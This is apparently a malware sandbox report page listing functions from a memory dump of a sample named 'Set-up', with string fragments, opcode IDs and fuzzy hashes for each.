                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: N*I$$[.
                                                                                                                                                                                                                                                              • API String ID: 0-328004532
                                                                                                                                                                                                                                                              • Opcode ID: 97cd9afdbec01a71f2002f68d059e3fb774be6e64a5fdae1a98def6de46a1bb9
                                                                                                                                                                                                                                                              • Instruction ID: de58f69cca2f4e08e944df2231b19ee88f6de0c191076ecf18170ace0ec16cd8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97cd9afdbec01a71f2002f68d059e3fb774be6e64a5fdae1a98def6de46a1bb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0128221508FD2CED336C63C880834ABFD16B67224F098B9DD1F64BBE2C765A506C766
                                                                                                                                                                                                                                                              Function 02219C38 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: -$.
                                                                                                                                                                                                                                                              • API String ID: 0-3807043784
                                                                                                                                                                                                                                                              • Opcode ID: e8bfc1189610befe8a93f0d4bb85ecc5bed45ebc053b23a2a7b0190d71e66edb
                                                                                                                                                                                                                                                              • Instruction ID: 814a372c243c4f18ef8903854665f01150ff7b29ab26ce93e85949ebd7f61061
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8bfc1189610befe8a93f0d4bb85ecc5bed45ebc053b23a2a7b0190d71e66edb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58A18E32E282624BC3148E69C8606A6FBE39BD5220F19C75AD8D5973DDEB34DD81C7C1
                                                                                                                                                                                                                                                              Function 02230078 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: .$23,-
                                                                                                                                                                                                                                                              • API String ID: 0-3099856921
                                                                                                                                                                                                                                                              • Opcode ID: c4867b4046678fd1a4e703d2f88df1e83f5430be957c335267209f1f2253d90f
                                                                                                                                                                                                                                                              • Instruction ID: 203ea8e8a63b05666a6a2899de84bbed246aa7f54c5d3dedddb853f49cefa4bf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4867b4046678fd1a4e703d2f88df1e83f5430be957c335267209f1f2253d90f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A128726583614FCB16CE68C89036EBBE2ABC5220F18C67DE8E5CB395C774D906C791
                                                                                                                                                                                                                                                              Function 0223DE00 Relevance: 2.7, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 1>$I_
                                                                                                                                                                                                                                                              • API String ID: 0-216584966
                                                                                                                                                                                                                                                              • Opcode ID: ed80e920f18ba18a6f30b9943c8592f4b06ac950735bfd4f2cb628694719f301
                                                                                                                                                                                                                                                              • Instruction ID: d8a804634f921f452b1579eea8f89bc090cf91071662803b6d468e6801db54cf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed80e920f18ba18a6f30b9943c8592f4b06ac950735bfd4f2cb628694719f301
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D371FEB52283018BD715CF65C8A2B6BB7F1EF86714F08896CE4868B799E778C504CB16
                                                                                                                                                                                                                                                              Function 0224F8F8 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: LEM5$LEM5
                                                                                                                                                                                                                                                              • API String ID: 0-1309638290
                                                                                                                                                                                                                                                              • Opcode ID: ae2b7b58291b8b9bb849e1cdbe116f3c1708aa5fdfe71bb9fae912ecea2bb5cb
                                                                                                                                                                                                                                                              • Instruction ID: 037aefd9c2ca13c6cfda8b67331fe09c926c17a102634df5b69d412e0ac72406
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2b7b58291b8b9bb849e1cdbe116f3c1708aa5fdfe71bb9fae912ecea2bb5cb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D617D326283618FD318CF68C65036EB7D2EBC6324F59872EE4A58B7E8DB748445C742
                                                                                                                                                                                                                                                              Function 0222DAF7 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: F<RK$_
                                                                                                                                                                                                                                                              • API String ID: 0-467998110
                                                                                                                                                                                                                                                              • Opcode ID: 66396c7c332bf48bb2264303380fe41f9e377862ea000026689b410395731e89
                                                                                                                                                                                                                                                              • Instruction ID: fe3a4e01bdd1d947a8d75319a54dc31d147a1357cbcfe3f5f71aac939a3565ab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66396c7c332bf48bb2264303380fe41f9e377862ea000026689b410395731e89
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A5159B155C3915FE7158F64C89036FFBE1DB92304F08992CE1C1A7292C3BAC8098B56
                                                                                                                                                                                                                                                              Function 02234458 Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: #D#J$KH
                                                                                                                                                                                                                                                              • API String ID: 0-3522619608
                                                                                                                                                                                                                                                              • Opcode ID: bc61465ca6767d1913d66107e6f48a9c1a4a9bde877ecb8d0dc20e4c9fafb32a
                                                                                                                                                                                                                                                              • Instruction ID: 058dcb14974d8b1bc582b60fafce4d89b6e30da52b84fbe3be70553c43ec051c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc61465ca6767d1913d66107e6f48a9c1a4a9bde877ecb8d0dc20e4c9fafb32a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A12105A1A283028BD3119F68C851777B7F2FF92324F059A58E091CB298F378C544C796
                                                                                                                                                                                                                                                              Function 0224398A Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ol$|r
                                                                                                                                                                                                                                                              • API String ID: 0-94947588
                                                                                                                                                                                                                                                              • Opcode ID: e28595ae0fd4debb60f6ff698f082b533d39de77fd323586d00179b6eaaa31e9
                                                                                                                                                                                                                                                              • Instruction ID: 5401b58f5ae33fb7af6686b7ab9cb50cdb9ee09da8c8014fb868c02edac8b19f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e28595ae0fd4debb60f6ff698f082b533d39de77fd323586d00179b6eaaa31e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E541D2726193C18BD374CF65C8553EBBBE2AFD6304F29886DD4C94B396CA350002CB46
                                                                                                                                                                                                                                                              Function 0221B658 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "#$WQ
                                                                                                                                                                                                                                                              • API String ID: 0-1672720038
                                                                                                                                                                                                                                                              • Opcode ID: 7cac1a28be8fa5d6dfca3d492581fae87361e06edf2860a9bbf2b3101fd31c2d
                                                                                                                                                                                                                                                              • Instruction ID: 4d288f757b3ce2808e3987878f2362afbfbc6631dd9b040dea665a4ab0e196b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cac1a28be8fa5d6dfca3d492581fae87361e06edf2860a9bbf2b3101fd31c2d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE1103346183408FE308CF359C916AFBBA2ABD3314F18CA2CA1D957386C7349406CB4A
                                                                                                                                                                                                                                                              Function 0222E2E2 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: RF\=
                                                                                                                                                                                                                                                              • API String ID: 0-2050078478
                                                                                                                                                                                                                                                              • Opcode ID: 96419abeb1382cdb758b81842613a285b725111bd766334065efb40fb4028f94
                                                                                                                                                                                                                                                              • Instruction ID: 97b19930017baf9d67aa67a07a24d217ee31f7c9184d769417d26c7bee146c33
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96419abeb1382cdb758b81842613a285b725111bd766334065efb40fb4028f94
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6E157715283218BD714CF24C89036BB7F2FFC6314F19991CE8D19B299E7BA940ACB52
                                                                                                                                                                                                                                                              Function 02233CF8 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                                                                              • API String ID: 0-1016091060
                                                                                                                                                                                                                                                              • Opcode ID: 9673bd7c600ea52ff7bcd139fed49ebbff0850bd7c6266ea79e35c4c73a9e10a
                                                                                                                                                                                                                                                              • Instruction ID: 80c50d58ea1b570e9beaeef3b1c8f6a4eae66713831c59fda151cf6f8e7f3941
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9673bd7c600ea52ff7bcd139fed49ebbff0850bd7c6266ea79e35c4c73a9e10a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E104B25183108BD724DF58C8517ABB7F2EFC5314F098A5CD8D59B3A4E7B89804CB92
                                                                                                                                                                                                                                                              Function 022351E8 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 8
                                                                                                                                                                                                                                                              • API String ID: 0-406019892
                                                                                                                                                                                                                                                              • Opcode ID: 766da3eeb465bfa425cb44ba918d3dbc23ea9f53c06ca5359bc07fff13288404
                                                                                                                                                                                                                                                              • Instruction ID: 496d494f8a2183f83de237558aac729975539a3d7a190b2a836532ac40e6ea49
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 766da3eeb465bfa425cb44ba918d3dbc23ea9f53c06ca5359bc07fff13288404
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAE1D2B16183418BD714DFA8C891B6BF7E1EFC9314F48892CE4898B395E7B8D845CB52
                                                                                                                                                                                                                                                              Function 022407D8 Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                                                              • Opcode ID: fe18829f8f1d22ab47799126df493e4ad866210e2d7dba0a3b61701e2332ea2d
                                                                                                                                                                                                                                                              • Instruction ID: dccb1743c4896a6d59969f988b6150629b078070cb95bed38bdccedaaf8cd726
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe18829f8f1d22ab47799126df493e4ad866210e2d7dba0a3b61701e2332ea2d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FC18FB2A243119FD72DCEA4C450B6F77D9AF85314F08852DDA9587385EB34DA88CBC2
                                                                                                                                                                                                                                                              Function 0223B628 Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: S_XY
                                                                                                                                                                                                                                                              • API String ID: 0-4291373265
                                                                                                                                                                                                                                                              • Opcode ID: 373e0a5ac6767158bcb79a2b98029e0b2807ddd6eda420dd620a35cbe9c23d26
                                                                                                                                                                                                                                                              • Instruction ID: 8a87abab066df91e43c09c1645670b1e30b9517f386fa7ecda76f79bd7ca8282
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 373e0a5ac6767158bcb79a2b98029e0b2807ddd6eda420dd620a35cbe9c23d26
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53C17CF2A283018BD7258F68C88176BB7E2EFC6718F58862CD4859B389D775D806C781
                                                                                                                                                                                                                                                              Function 02235788 Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: t`a
                                                                                                                                                                                                                                                              • API String ID: 0-670038931
                                                                                                                                                                                                                                                              • Opcode ID: acd815b6e764387253c5e3206f378e773d675b555236fd8eff1b5caf292311d2
                                                                                                                                                                                                                                                              • Instruction ID: 1e22a77a1659b517aaf6aa604f23821eecc738b7f0db3786c122bdf70178baa2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acd815b6e764387253c5e3206f378e773d675b555236fd8eff1b5caf292311d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0A16AF15283018BDB219F64C891B6BB3F1EF85324F88892CE8CD97285E378D959C752
                                                                                                                                                                                                                                                              Function 0222F78D Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: u#
                                                                                                                                                                                                                                                              • API String ID: 0-2985750078
                                                                                                                                                                                                                                                              • Opcode ID: f8ca11de1262b8232ac37757d98c1fabe447e423b00c245835bcc55e0ce1e27f
                                                                                                                                                                                                                                                              • Instruction ID: ed215bf819a8d53f739216d2d943786861440d59ae61ab985651744fee822b3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8ca11de1262b8232ac37757d98c1fabe447e423b00c245835bcc55e0ce1e27f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA1E0B05183629AD720CF64C85176BB7F2FFD6344F248A2CE4C45B7A4E37A8509CB86
                                                                                                                                                                                                                                                              Function 022272E8 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Qg
                                                                                                                                                                                                                                                              • API String ID: 0-833587729
                                                                                                                                                                                                                                                              • Opcode ID: ba12dfa02f9515c73b9330d075f1ca92be4f53d35f25c379e94a0c0f9f453d6b
                                                                                                                                                                                                                                                              • Instruction ID: 5cfb3952bb6c67c9146cb7cdd83eefd31ce576c8846ca2bc1b1c3075ae20e435
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba12dfa02f9515c73b9330d075f1ca92be4f53d35f25c379e94a0c0f9f453d6b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B9133B19283158BC314DF68C892767F7E1EF81324F088A2CE8868B3D5F7799949C752
                                                                                                                                                                                                                                                              Function 02250968 Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: NP,?
                                                                                                                                                                                                                                                              • API String ID: 0-3110377521
                                                                                                                                                                                                                                                              • Opcode ID: 137e78b7eeeefc72a5227af257c79c4c63bcd0f2f5d5d4c8db24870fab693795
                                                                                                                                                                                                                                                              • Instruction ID: c3fe5ecf491069d893cd937e21473a866aa3c0dc1d9032e6aa91d8049798c45e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 137e78b7eeeefc72a5227af257c79c4c63bcd0f2f5d5d4c8db24870fab693795
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0A13B72A143259BD324DF94CC8072BB7A2EBC9328F15C72CED986B298D771AD05C791
                                                                                                                                                                                                                                                              Function 0223E477 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PV
                                                                                                                                                                                                                                                              • API String ID: 0-3839218938
                                                                                                                                                                                                                                                              • Opcode ID: e42752800938075e6b86b595b2c6fa38619141a51d9b1ec0baa6f4388aec96b0
                                                                                                                                                                                                                                                              • Instruction ID: 81b6ca04a07bc796fe856e9f68e2e5e484e8751805343b67bb134b8955ee1ad6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e42752800938075e6b86b595b2c6fa38619141a51d9b1ec0baa6f4388aec96b0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6681BDB1D013109FEB14CF69C98579A7FB2FB45310F1682A8D915AF39ADB7988068FC1
                                                                                                                                                                                                                                                              Function 0224A7D8 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                                              • Opcode ID: cd21be1470fef147fb591fac058bec4acae7d792ce5bdd6abf16eb9b6176df19
                                                                                                                                                                                                                                                              • Instruction ID: 5991f9439c158a6e82efb1548d88de2de8834262019d0255c7ce3ba7f6e4f146
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd21be1470fef147fb591fac058bec4acae7d792ce5bdd6abf16eb9b6176df19
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E61F9337A9A914BD32C5DBC4C613A979934BC7130B2D837EA6B1CB3E5ED9989054390
                                                                                                                                                                                                                                                              Function 0223AC7C Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: #
                                                                                                                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                                                                                                                              • Opcode ID: 26225a64fac106f5463212d739031e8b14573c2f2c8f720b84a15a9562e33075
                                                                                                                                                                                                                                                              • Instruction ID: 9bf3467de8146d6fa5652c9cbc98f32f110230f8ca56c20c023cd076272214d7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26225a64fac106f5463212d739031e8b14573c2f2c8f720b84a15a9562e33075
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951AEB26683518FC721CFE888D0267B7D2DF96328F098279D5D10F399D3759809C391
                                                                                                                                                                                                                                                              Function 0221F348 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ~,D)
                                                                                                                                                                                                                                                              • API String ID: 0-1297392986
                                                                                                                                                                                                                                                              • Opcode ID: 3942f91f038332778de6d02c71da556ed910f69767f7681c1840937b111c8ccc
                                                                                                                                                                                                                                                              • Instruction ID: 9c41305516523cb76d5fe0ad7b654c7fe2597e7bd1614a35fa52341169fd9458
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3942f91f038332778de6d02c71da556ed910f69767f7681c1840937b111c8ccc
